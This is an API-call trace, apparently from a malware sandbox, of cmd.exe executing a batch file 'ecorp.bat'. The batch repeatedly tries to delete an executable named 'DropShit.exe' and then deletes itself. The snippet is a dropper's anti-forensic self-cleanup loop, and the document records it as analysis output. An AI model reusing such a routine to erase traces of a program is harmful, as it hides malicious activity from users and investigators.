_open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0092.107] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.107] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.107] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.107] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x51 [0092.107] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.107] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.107] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.107] GetFileType (hFile=0x5c) returned 0x1 [0092.107] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.107] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0xf, lpOverlapped=0x0) returned 1 [0092.107] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=15, lpWideCharStr=0x4a9b7b60, cchWideChar=512 | out: lpWideCharStr="del ecorp.bat\r\n") returned 15 [0092.107] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.107] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0092.107] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.107] GetFileType (hFile=0x5c) returned 0x1 [0092.107] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0092.107] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0x0, lpOverlapped=0x0) returned 1 [0092.107] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.107] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.107] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.107] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.107] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.107] GetFileType (hFile=0x5c) returned 0x1 [0092.108] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.108] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0x51, lpOverlapped=0x0) returned 1 [0092.108] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0092.108] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=9, lpWideCharStr=0x4a9b7b60, cchWideChar=512 | out: lpWideCharStr=":Repeat\r\n.bat\r\n") returned 9 [0092.108] _close (_FileHandle=3) returned 0 [0092.108] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.108] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0092.108] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.108] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0092.108] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.108] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0092.108] SetConsoleInputExeNameW () returned 0x1 [0092.108] GetConsoleOutputCP () returned 0x1b5 [0092.109] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0092.109] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0092.109] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0092.109] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0092.109] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.109] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0092.109] GetProcessHeap () returned 0x250000 [0092.109] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266aa0 | out: hHeap=0x250000) returned 1 [0092.109] GetProcessHeap () returned 0x250000 [0092.109] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278ff0 | out: hHeap=0x250000) returned 1 [0092.109] GetProcessHeap () returned 0x250000 [0092.109] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278fc0 | out: hHeap=0x250000) returned 1 [0092.109] GetProcessHeap () returned 0x250000 [0092.109] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278f90 | out: hHeap=0x250000) returned 1 [0092.109] GetProcessHeap () returned 0x250000 [0092.109] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26d0b0 | out: hHeap=0x250000) returned 1 [0092.109] GetProcessHeap () returned 0x250000 [0092.109] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x268a10 | out: hHeap=0x250000) returned 1 [0092.109] GetProcessHeap () returned 0x250000 [0092.109] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0092.109] GetProcessHeap () returned 0x250000 [0092.109] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x264610 | out: hHeap=0x250000) returned 1 [0092.109] GetProcessHeap () returned 0x250000 [0092.109] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cff0 | out: hHeap=0x250000) returned 1 [0092.109] GetProcessHeap () returned 0x250000 [0092.109] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2645e0 | out: hHeap=0x250000) returned 1 [0092.109] GetProcessHeap () returned 0x250000 [0092.109] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0092.109] GetProcessHeap () returned 0x250000 [0092.109] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cf30 | out: hHeap=0x250000) returned 1 [0092.109] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.109] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0092.110] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x48, lpOverlapped=0x0) returned 1 [0092.110] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0092.110] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=20, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="del \"DropShit.exe\"\r\nxe\" goto Repeat\r\n") returned 20 [0092.110] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.110] GetFileType (hFile=0x5c) returned 0x1 [0092.110] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.110] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0092.110] GetProcessHeap () returned 0x250000 [0092.110] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x27c760 [0092.110] GetProcessHeap () returned 0x250000 [0092.110] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27c760 | out: hHeap=0x250000) returned 1 [0092.110] GetProcessHeap () returned 0x250000 [0092.110] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cf30 [0092.110] GetProcessHeap () returned 0x250000 [0092.110] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x18) returned 0x27a2f0 [0092.110] GetProcessHeap () returned 0x250000 [0092.110] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266a60 [0092.110] _tell (_FileHandle=3) returned 29 [0092.110] _close (_FileHandle=3) returned 0 [0092.110] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0092.110] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.110] GetFileType (hFile=0x7) returned 0x2 [0092.110] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.110] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0092.111] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.111] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0092.111] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.111] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0092.111] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0092.111] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.111] GetFileType (hFile=0x7) returned 0x2 [0092.112] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.112] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0092.112] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.112] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0092.112] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.112] GetFileType (hFile=0x7) returned 0x2 [0092.112] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.112] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef98 | out: lpMode=0x14ef98) returned 1 [0092.112] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.112] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x27a300*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efd8, lpReserved=0x0 | out: lpBuffer=0x27a300*, lpNumberOfCharsWritten=0x14efd8*=0x3) returned 1 [0092.113] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer=" \"DropShit.exe\" ") returned 16 [0092.113] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.113] GetFileType (hFile=0x7) returned 0x2 [0092.113] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.113] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.113] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.113] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x10) returned 1 [0092.113] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0092.113] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.113] GetFileType (hFile=0x7) returned 0x2 [0092.114] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.114] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.114] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.114] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0092.114] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0092.114] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0092.114] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0092.114] GetConsoleTitleW (in: lpConsoleTitle=0x14ed00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.114] GetProcessHeap () returned 0x250000 [0092.114] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x268a10 [0092.114] GetProcessHeap () returned 0x250000 [0092.114] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x268a10, Size=0x30) returned 0x268a10 [0092.114] GetProcessHeap () returned 0x250000 [0092.114] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x268a10) returned 0x30 [0092.115] GetProcessHeap () returned 0x250000 [0092.115] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x38) returned 0x266aa0 [0092.115] GetProcessHeap () returned 0x250000 [0092.115] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x268a50 [0092.115] GetProcessHeap () returned 0x250000 [0092.115] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x268a50, Size=0x30) returned 0x268a50 [0092.115] GetProcessHeap () returned 0x250000 [0092.115] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x268a50) returned 0x30 [0092.115] GetProcessHeap () returned 0x250000 [0092.115] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266ae0 [0092.115] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14e860 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.115] GetProcessHeap () returned 0x250000 [0092.115] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x268a90 [0092.115] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14d770 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.115] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x14e280, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0092.115] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0092.115] GetProcessHeap () returned 0x250000 [0092.115] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x26ccf0 [0092.115] GetProcessHeap () returned 0x250000 [0092.115] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x2518c0 [0092.115] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0092.115] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0092.115] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0092.115] GetProcessHeap () returned 0x250000 [0092.115] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x218) returned 0x251b30 [0092.115] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x251b40 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.115] SetErrorMode (uMode=0x0) returned 0x0 [0092.115] SetErrorMode (uMode=0x1) returned 0x0 [0092.115] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x104, lpBuffer=0x14d790, lpFilePart=0x14d780 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14d780*="DropShit.exe") returned 0x32 [0092.115] SetErrorMode (uMode=0x0) returned 0x1 [0092.116] GetProcessHeap () returned 0x250000 [0092.116] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x26ef00 [0092.116] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0092.116] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0092.116] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0092.116] GetProcessHeap () returned 0x250000 [0092.116] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266b20 [0092.116] GetProcessHeap () returned 0x250000 [0092.116] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x26cd50 [0092.116] GetProcessHeap () returned 0x250000 [0092.116] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x26cdc0 [0092.116] GetProcessHeap () returned 0x250000 [0092.116] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x810) returned 0x26f170 [0092.116] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x0, lpFindFileData=0x26f184, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f184) returned 0x251d50 [0092.116] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0 [0092.116] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0 [0092.116] GetLastError () returned 0x5 [0092.116] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x14dc38 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe\r\n") returned 52 [0092.116] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.116] GetFileType (hFile=0x7) returned 0x2 [0092.117] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.117] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14dbc8 | out: lpMode=0x14dbc8) returned 1 [0092.117] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.117] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x14dc08, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14dc08*=0x34) returned 1 [0092.117] _get_osfhandle (_FileHandle=2) returned 0xb [0092.117] GetFileType (hFile=0xb) returned 0x2 [0092.118] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0092.118] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14db68 | out: lpMode=0x14db68) returned 1 [0092.118] _get_osfhandle (_FileHandle=2) returned 0xb [0092.118] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14dba0 | out: lpConsoleScreenBufferInfo=0x14dba0) returned 1 [0092.118] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0092.118] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x14dc10 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0092.118] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0x14db90, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14db90*=0x13) returned 1 [0092.119] FindNextFileW (in: hFindFile=0x251d50, lpFindFileData=0x26f184 | out: lpFindFileData=0x26f184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec7a8400, ftCreationTime.dwHighDateTime=0x1d53bb1, ftLastAccessTime.dwLowDateTime=0xed131a80, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xeb495700, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x9600, dwReserved0=0x0, dwReserved1=0x0, cFileName="DropShit.exe", cAlternateFileName="")) returned 0 [0092.119] GetLastError () returned 0x12 [0092.119] FindClose (in: hFindFile=0x251d50 | out: hFindFile=0x251d50) returned 1 [0092.119] GetProcessHeap () returned 0x250000 [0092.119] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26f170 | out: hHeap=0x250000) returned 1 [0092.119] GetProcessHeap () returned 0x250000 [0092.119] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cdc0 | out: hHeap=0x250000) returned 1 [0092.119] GetProcessHeap () returned 0x250000 [0092.119] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266b20 | out: hHeap=0x250000) returned 1 [0092.119] GetProcessHeap () returned 0x250000 [0092.119] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cd50 | out: hHeap=0x250000) returned 1 [0092.119] GetProcessHeap () returned 0x250000 [0092.119] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ef00 | out: hHeap=0x250000) returned 1 [0092.119] GetProcessHeap () returned 0x250000 [0092.119] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251b30 | out: hHeap=0x250000) returned 1 [0092.119] GetProcessHeap () returned 0x250000 [0092.119] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2518c0 | out: hHeap=0x250000) returned 1 [0092.119] GetProcessHeap () returned 0x250000 [0092.119] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0092.119] GetProcessHeap () returned 0x250000 [0092.119] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x268a90 | out: hHeap=0x250000) returned 1 [0092.119] GetProcessHeap () returned 0x250000 [0092.119] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266ae0 | out: hHeap=0x250000) returned 1 [0092.119] GetProcessHeap () returned 0x250000 [0092.119] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x268a50 | out: hHeap=0x250000) returned 1 [0092.119] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.119] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0092.119] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.119] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0092.120] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.120] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0092.120] SetConsoleInputExeNameW () returned 0x1 [0092.120] GetConsoleOutputCP () returned 0x1b5 [0092.120] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0092.120] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0092.120] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0092.120] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0092.120] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.120] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0092.120] GetProcessHeap () returned 0x250000 [0092.120] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266aa0 | out: hHeap=0x250000) returned 1 [0092.120] GetProcessHeap () returned 0x250000 [0092.120] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x268a10 | out: hHeap=0x250000) returned 1 [0092.120] GetProcessHeap () returned 0x250000 [0092.120] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0092.120] GetProcessHeap () returned 0x250000 [0092.120] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0092.120] GetProcessHeap () returned 0x250000 [0092.121] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cf30 | out: hHeap=0x250000) returned 1 [0092.121] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.121] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0092.121] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x34, lpOverlapped=0x0) returned 1 [0092.121] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.121] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=37, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="if exist \"DropShit.exe\" goto Repeat\r\n") returned 37 [0092.121] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.121] GetFileType (hFile=0x5c) returned 0x1 [0092.121] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.121] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.121] GetProcessHeap () returned 0x250000 [0092.121] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x27c760 [0092.121] GetProcessHeap () returned 0x250000 [0092.121] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27c760 | out: hHeap=0x250000) returned 1 [0092.121] GetProcessHeap () returned 0x250000 [0092.121] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cf30 [0092.121] GetProcessHeap () returned 0x250000 [0092.121] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, 